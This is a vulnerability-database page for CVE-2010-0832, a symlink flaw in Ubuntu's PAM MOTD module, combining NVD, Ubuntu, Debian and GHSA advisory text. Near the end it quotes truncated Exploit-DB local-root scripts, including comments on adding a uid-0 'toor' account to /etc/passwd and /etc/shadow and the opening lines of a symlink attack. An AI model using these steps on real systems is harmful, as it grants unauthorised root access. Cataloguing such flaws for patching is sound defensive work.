CVE-2010-0832
published 2010-07-12CVE-2010-0832: pam_motd (aka the MOTD module) in libpam-modules before 1.1.0-2ubuntu1.1 in PAM on Ubuntu 9.10 and libpam-modules before 1.1.1-2ubuntu5 in PAM on Ubuntu 10.04…
PriorityP427medium6.9CVSS 2.0
AVLACMAuNCCICAC
EXPLOIT
EPSS
0.94%
56.5th percentile
pam_motd (aka the MOTD module) in libpam-modules before 1.1.0-2ubuntu1.1 in PAM on Ubuntu 9.10 and libpam-modules before 1.1.1-2ubuntu5 in PAM on Ubuntu 10.04 LTS allows local users to change the ownership of arbitrary files via a symlink attack on .cache in a user's home directory, related to "user file stamps" and the motd.legal-notice file.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| debian | pam | — | — |
CVSS provenance
nvdv2.06.9MEDIUMAV:L/AC:M/Au:N/C:C/I:C/A:C
vendor_debian6.9LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
PAM vulnerability
vendor_ubuntu·2010-10-25
CVE-2010-0832 PAM vulnerability
Title: PAM vulnerability
Summary: Gain root by following symlinks.
USN-959-1 fixed vulnerabilities in PAM. This update provides the
corresponding updates for Ubuntu 10.10.
Original advisory details:
Denis Excoffier discovered that the PAM MOTD module in Ubuntu did
not correctly handle path permissions when creating user file stamps.
A local attacker could exploit this to gain root privilieges.
Instructions: In general, a standard system update will make all the necessary changes.
Ubuntu
PAM vulnerability
vendor_ubuntu·2010-07-07
CVE-2010-0832 PAM vulnerability
Title: PAM vulnerability
Summary: Root privilege escalation via symlink following.
Denis Excoffier discovered that the PAM MOTD module in Ubuntu did
not correctly handle path permissions when creating user file stamps.
A local attacker could exploit this to gain root privilieges.
Instructions: In general, a standard system update will make all the necessary changes.
Debian
CVE-2010-0832: pam - pam_motd (aka the MOTD module) in libpam-modules before 1.1.0-2ubuntu1.1 in PAM ...
vendor_debian·2010·CVSS 6.9
CVE-2010-0832 [MEDIUM] CVE-2010-0832: pam - pam_motd (aka the MOTD module) in libpam-modules before 1.1.0-2ubuntu1.1 in PAM ...
pam_motd (aka the MOTD module) in libpam-modules before 1.1.0-2ubuntu1.1 in PAM on Ubuntu 9.10 and libpam-modules before 1.1.1-2ubuntu5 in PAM on Ubuntu 10.04 LTS allows local users to change the ownership of arbitrary files via a symlink attack on .cache in a user's home directory, related to "user file stamps" and the motd.legal-notice file.
Scope: local
bookworm: resolved
bullseye: resolved
forky: resolved
sid: resolved
trixie: resolved
GHSA
GHSA-3m5q-4mj3-9362: pam_motd (aka the MOTD module) in libpam-modules before 1
ghsa_unreviewed·2022-05-02
CVE-2010-0832 [MEDIUM] CWE-59 GHSA-3m5q-4mj3-9362: pam_motd (aka the MOTD module) in libpam-modules before 1
pam_motd (aka the MOTD module) in libpam-modules before 1.1.0-2ubuntu1.1 in PAM on Ubuntu 9.10 and libpam-modules before 1.1.1-2ubuntu5 in PAM on Ubuntu 10.04 LTS allows local users to change the ownership of arbitrary files via a symlink attack on .cache in a user's home directory, related to "user file stamps" and the motd.legal-notice file.
No detection rules found.
Exploit-DB
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)
exploitdb·2010-07-12·CVSS 6.9
CVE-2010-0832 [MEDIUM] Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)
---
#!/bin/bash
#
# Exploit Title: Ubuntu PAM MOTD local root
# Date: July 9, 2010
# Author: Anonymous
# Software Link: http://packages.ubuntu.com/
# Version: pam-1.1.0
# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)
# CVE: CVE-2010-0832
# Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i
# References: http://www.exploit-db.com/exploits/14273/ by Kristian Erik Hermansen
#
# Local root by adding temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow.
# Does not prompt for login by creating temporary SSH key and authorized_keys entry.
#
# user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh
# [*] Ubuntu PAM MOTD local root
# [*] Backuped /home/user/.
Exploit-DB
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)
exploitdb·2010-07-08·CVSS 6.9
CVE-2010-0832 [MEDIUM] Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)
---
#!/bin/sh
#
# EDB Note: Updated exploit ~ https://www.exploit-db.com/exploits/14339/
#
# Exploit Title: Ubuntu PAM MOTD file tampering (privilege escalation)
# Date: July 7, 2010
# Author: Kristian Erik Hermansen
# Software Link: http://packages.ubuntu.com/
# Version: pam-1.1.0
# Tested on: Ubuntu 10.04 LTS (Lucid Lynx)
# CVE : CVE-2010-0832
#
# Notes: Affects Ubuntu 9.10 and 10.04 LTS
# [Patch Instructions]
# $ sudo aptitude -y update; sudo aptitude -y install libpam~n~i
#
if [ $# -eq 0 ]; then
echo "Usage: $0 /path/to/file"
exit 1
fi
mkdir $HOME/backup 2> /dev/null
tmpdir=$(mktemp -d --tmpdir=$HOME/backup/)
mv $HOME/.cache/ $tmpdir 2> /dev/null
echo "\n@@@ File before tampering ...\n"
ls -l $1
ln -
No writeups or analysis indexed.
http://secunia.com/advisories/40512http://twitter.com/jonoberheide/statuses/18009527979http://www.exploit-db.com/exploits/14273http://www.h-online.com/security/news/item/Ubuntu-closes-root-hole-1034618.htmlhttp://www.osvdb.org/66116http://www.securityfocus.com/bid/41465http://www.ubuntu.com/usn/USN-959-1http://www.vupen.com/english/advisories/2010/1747https://exchange.xforce.ibmcloud.com/vulnerabilities/60194http://secunia.com/advisories/40512http://twitter.com/jonoberheide/statuses/18009527979http://www.exploit-db.com/exploits/14273http://www.h-online.com/security/news/item/Ubuntu-closes-root-hole-1034618.htmlhttp://www.osvdb.org/66116http://www.securityfocus.com/bid/41465http://www.ubuntu.com/usn/USN-959-1http://www.vupen.com/english/advisories/2010/1747https://exchange.xforce.ibmcloud.com/vulnerabilities/60194
2010-07-12
Published